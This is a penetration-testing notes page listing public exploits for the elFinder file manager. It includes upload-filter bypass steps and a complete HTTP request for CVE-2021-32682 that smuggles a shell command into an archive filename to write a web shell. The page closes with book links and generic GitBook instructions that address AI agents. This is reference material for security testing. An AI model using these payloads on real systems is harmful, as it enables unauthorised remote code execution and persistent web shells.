> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/elfinder.md). # ElFinder [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) *elFinder* is an open-source file manager for web, written in JavaScript using jQuery UI - Ref: ## CVE-2023-52044 - ElFinder 2.1.62 - RCE Studio-42 eLfinder 2.1.62 is vulnerable to Remote Code Execution (RCE) as there is no restriction for uploading files with the .php8 extension. 1. Select arbitrary png file to upload 2. Capture request with Burp and set content as `test` 3. Set filename like `test.php8` 4. After forwarding the request, the file is successfully uploaded under the files directory {% embed url="" %} {% embed url="" %} ## CVE-2023-35840 - elFinder < 2.1.62 - Path Traversal {% embed url="" %} ## elFinder < 2.6.61 - RCE {% embed url="" %} 1. Upload a PHP file the contains a payload with a preceding `a`, i.e: `a?>`. 2. Add two dots after the file name: `shell.php...` 3. The shell file is successfully uploaded by bypassing detection and can be accessed via `files/shell.php`. ## CVE-2022-26960 - LFI elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. {% embed url="" %}

## CVE-2021-32682 - RCE {% embed url="" %} {% embed url="" %} Create a plain text file named `1.txt`

Archive this file in the right-click menu to ZIP format, and modify this archived file name to `2.zip`:

`1.txt` and `2.zip` are ready here

Then, send the following request to execute arbitrary commands: ``` GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1 Host: your-ip Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://localhost.lan:8080/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close ``` In this request, you can see 3 important parameters: * `name`, its value is equal to `-TvTT=id>shell.php # a.zip`, you can modify the `id>shell.php` to arbitrary commands * `targets[0]`, its value is equal to `l1_MS50eHQ`. `l1` means the first storage volume, `MS50eHQ` is the base64 encoded string of `1.txt` * `targets[1]`, its value is equal to `l1_Mi56aXA`. `l1` means the first storage volume, `Mi56aXA` is the base64 encoded string of `2.zip` Although this request responeds to an error message, our command has been executed and `shell.php` has been written to `http://your-ip:8080/files/shell.php`

## CVE-2021-43421 RCE in elFinder <2.1.60 {% embed url="" %} {% embed url="" %} ## elFinder 2.1.57 RCE {% embed url="" %} ## elFinder Web file manager Version: 2.1.53 Remote Command Execution {% embed url="" %} ## CVE-2019-9194 - elFinder <= 2.1.47 - Command Injection Vulnerability in the PHP connector {% embed url="" %} {% embed url="" %} ## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/elfinder.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.